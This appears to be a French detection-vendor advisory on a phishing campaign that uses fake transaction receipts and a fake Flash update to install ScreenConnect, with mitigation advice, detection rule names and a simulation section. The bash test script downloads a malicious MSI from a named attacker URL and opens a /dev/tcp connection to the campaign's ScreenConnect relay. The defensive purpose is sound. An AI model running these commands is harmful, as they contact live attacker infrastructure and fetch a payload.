Malware Phishing/Escroquerie : E-mails de Hameçonnage Déguisés en Reçus de Transaction
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Les acteurs malveillants envoient des emails de phishing qui usurpent l’identité d’employés d’entreprises américaines et incluent des pièces jointes déguisées en reçus de transaction. L’attaque utilise un PDF malveillant pour inciter les utilisateurs à télécharger une supposée mise à jour d’Adobe Flash Player qui lance en réalité un VBScript. Le script installe ensuite l’outil légitime de gestion à distance ScreenConnect pour établir un accès à distance persistant pour des activités ultérieures.
Enquête
AhnLab Security Intelligence Center (ASEC) a identifié la campagne en examinant le contenu des emails de phishing et le comportement du PDF joint. L’enquête a retracé la chaîne d’exécution du VBScript malveillant à la récupération en arrière-plan des charges utiles et à l’installation silencieuse d’un paquet MSI en utilisant curl.exe and msiexec.exe.
Atténuation
Les utilisateurs doivent être formés à reconnaître les tentatives de phishing impliquant des reçus de transaction inattendus et des demandes d’installation de mises à jour logicielles telles qu’Adobe Flash Player. Les organisations devraient restreindre l’exécution de VBScript et surveiller l’utilisation non autorisée d’outils de gestion à distance incluant ScreenConnect. Le listing d’applications autorisées peut également aider à empêcher l’exécution de paquets MSI inconnus ou non approuvés.
Réponse
Si une activité malveillante est détectée, le système affecté doit être isolé immédiatement pour éviter un accès à distance via ScreenConnect. Les répondants doivent mettre fin aux sessions actives associées à relay.Gamedbd.Com infrastructure et inspecter le registre pour les informations de session stockées. Une enquête médico-légale complète devrait également déterminer si un mouvement latéral ou une exfiltration de données a eu lieu via l’outil de gestion à distance.
Flux d’attaque
Nous mettons encore à jour cette partie.
Détections
LOLBAS WScript / CScript (via process_creation)
Logiciel alternatif d’accès / gestion à distance (via process_creation)
Infiltration / Exfiltration de données possible / C2 via des services / outils tiers (via proxy)
Infiltration / Exfiltration de données possible / C2 via des services / outils tiers (via dns)
IOCs (HashMd5) pour détecter : Malware Phishing/Scam : Emails de phishing déguisés en reçus de transaction
Détection d’emails de phishing déguisés en reçus de transaction [Proxy]
Email de phishing usurpant un reçu de transaction menant à l’installation d’un paquet MSI [Création de processus Windows]
Exécution de la simulation
Prérequis : Le contrôle préalable Télémetrie & Baseline doit avoir réussi.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer exactement la télémétrie attendue par la logique de détection. Des exemples abstraits ou non liés mèneront à un mauvais diagnostic.
-
Récit d’attaque & Commandes : L’adversaire lance une campagne de phishing en envoyant un email concernant une transaction échouée. Le lien dirige la victime vers
https://transaction-sucessful.vercel.app, qui héberge un faux reçu. Lorsque la victime clique sur « Télécharger le reçu », le navigateur tente de récupérerhttps://payment-six-eta.vercel.app/doc/sc.msi. Une fois la charge utile exécutée, elle tente d’établir une session d’accès à distance en se connectant au relais ScreenConnect àrelay.gamedbd.com:8041. Cette séquence teste à la fois la détection basée sur l’URL et la logique de détection basée sur le domaine/port. -
Script de test de régression :
#!/bin/bash # Script de simulation pour déclencher la règle de détection Phishing/ScreenConnect echo "[+] Démarrage de la simulation : Test de détection Phishing/ScreenConnect" # 1. Simuler le téléchargement du MSI malveillant depuis l'URL Vercel echo "[+] Étape 1 : Simulation de connexion à l'URL Vercel malveillante..." curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi" # 2. Simuler la connexion au domaine/port spécifique du relais ScreenConnect echo "[+] Étape 2 : Simulation de connexion au relais ScreenConnect malveillant..." # Nous utilisons /dev/tcp pour simuler une tentative de connexion sans nécessiter de listener réel timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null echo "[+] Simulation terminée. Vérifiez les alertes dans le SIEM." -
Commandes de nettoyage :
# Aucune artefact persistant n'est créé par cette simulation basée sur le réseau. # Si des fichiers locaux ont été téléchargés, ils doivent être supprimés : rm -f sc.msi echo "[+] Nettoyage terminé."